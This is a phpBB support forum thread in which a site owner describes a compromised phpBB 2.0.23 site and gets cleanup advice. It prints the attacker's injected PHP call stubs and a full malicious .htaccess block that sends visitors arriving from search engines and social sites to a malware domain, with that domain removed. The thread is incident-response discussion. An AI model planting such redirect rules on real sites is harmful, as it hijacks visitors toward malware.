phpBB 2.0.23 site hacked?

[Quiff Boy]

i have a very old site running phpBB 2.0.23

it has a few hacks such as xs-style and phpFetchAll, and fairly low traffic so to be honest i've never really done much to it

recently it seems to have been hacked, however

all the php files in the forum root have code like this added to the bottom somehow:

Code: Select all

<?php echo "\n"; @__sfd1214476411__(); ?>

<?php echo "\n"; @__sfd1214578526__(); ?>

<?php echo "\n"; @__sfd1214585937__(); ?>

<?php echo "\n"; @__sfd1214920973__(); ?>

<?php echo "\n"; @__sfd1214945203__(); ?>

<?php echo "\n"; @__sfd1215291671__(); ?>

<?php echo "\n"; @__sfd1215294373__(); ?>

<?php echo "\n"; @__sfd1215531844__(); ?>

<?php echo "\n"; @__sfd1215534407__(); ?>

<?php echo "\n"; @__sfd1215703566__(); ?>

<?php echo "\n"; @__sfd1215873644__(); ?>

<?php echo "\n"; @__sfd1215875163__(); ?>

<?php echo "\n"; @__sfd1216145355__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216242515__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216260003__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216475749__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216477575__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216677986__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216679752__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216892086__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216915712__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1216918006__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1217366459__(); ?>

<?php error_reporting(0); echo "\n"; @__sfd1217368134__(); ?>

which causes pages within the forum section, and any pages powered by phpfetchall to redirect to a russian malware site

i've been through and removed all that injected code, but my worries are:

1) what the hell is that code doing?

2) how did they inject it into the core phpBB files?

3) by removing all that from the core phpBB files, have i indeed cleaned it up, or is there something else buried deep within an include that might allow them back into the server to re-inject?

one of the problems i face is that it's running an old version of php, and it's not my hosting to update. i merely uploaded a site to a friend's hosting

here's the phpinfo() if that helps debug?

http://ghostdance.co.uk/info.php

key details i think are:

Apache/1.3.27 (Unix) (Red-Hat/Linux) Sun-ONE-ASP/4.0.0 FrontPage/5.0.2.2623 mod_jk/1.2.2 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.4.7

has anyone come across this before?

[Dogs and Things]

My guess is that this is not a problem with phpBB2 but with hacking at the server level.

[Thoul]

Code: Select all

1) what the hell is that code doing? 

It's calling a bunch of functions that don't exist in phpBB or the mods you mentioned. My guess would be that another *.php file has been compromised to hold these functions. Look in other files for function names like "__sfd1214578526__".

If the redirect is only happening on pages that use Fetch All, I would check the Fetch All files to see if they've been altered. It might also be worth checking to see if you have the latest version of Fetch All. Apparently there was an SQL injection flaw in older versions:
http://xforce.iss.net/xforce/xfdb/16957
If you have one of the affected versions, that might be how this happened.

3) by removing all that from the core phpBB files, have i indeed cleaned it up, or is there something else buried deep within an include that might allow them back into the server to re-inject?

You've cleaned up at least part of it, but whatever vulnerability that allowed this to happen would likely still be present. I don't recall seeing an attack like this in the past. Dogs and Things may be right; the weak point could be at the server level rather than the phpBB or hack software level.

[Quiff Boy]

thanks. i had a look at phpbb fetch all and it seems i was running 2.0.9

i've updated it to 2.0.12 and will resubmit to google to see if they can re-scan and remove the alert that safari is getting:

http://google.com/safebrowsing/diagnost ... k&hl=en-us

i've also disabled register_globals via a line in .htaccess

looks like the server's security is generally a bit on the, ahem, loose side

when i get chance i think i'll redo the forum in phpbb v3. in the meantime, i'll keep an eye out and watch for other issues via the hosting, like d&t suggests

thanks for the pointers, guys

----------------------
edit:

ah, what the hell. i've upgraded it to phpbb 3.0.9

the theme needs quite a bit of tweaking, but it will do for now, and hopefully it's secure!!

it does look like the server is running such an old version of php that i wont be able to move to 3.1 whenever that's released though... the hosting company (easily) are pretty slack, it seems.


----------------------
second edit:

just had a look again today and it looks to have been re-hacked

i've spotted that they're modifying the htaccess file and adding in a load of redirects as hidden characters somehow

eg:

(i've removed the actual .ru domain to prevent phpbbhacks being flagged as a link farm...)

Code: Select all

ErrorDocument 400 http://[domain-removed]/payment/index.php
ErrorDocument 401 http://[domain-removed]/payment/index.php
ErrorDocument 403 http://[domain-removed]/payment/index.php
ErrorDocument 404 http://[domain-removed]/payment/index.php
ErrorDocument 500 http://[domain-removed]/payment/index.php

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*ask\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*yahoo\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*baidu\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*youtube\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*qq\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*excite\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*altavista\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*msn\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*netscape\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*aol\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*hotbot\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*goto\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*infoseek\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*mamma\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*lycos\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*search\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*bing\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*dogpile\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*facebook\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*twitter\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*blog\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*live\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*myspace\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*mail\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*yandex\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*rambler\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*ya\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*aport\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*linkedin\.(.*) [OR]
RewriteCond %{HTTP_REFERER} .*flickr\.(.*)
RewriteRule ^(.*)$ http://[domain-removed]/payment/index.php [R=301,L]
</IfModule>

they're also managing to change the chowner of htaccess to apache

i'm assuming therefore it's a server weakness rather than an explit due to phpBB or any related mods?

i've deleted the hacked htaccess file and put my own back, and then chmodded it to 444 to remove write permissions (although i guess they could still delete it and create their own new one...?)

i'll keep my eye on what happens next

[Thoul]

Yeah, I'd say that's almost certainly a server level issue. It shouldn't be possible through phpBB 3.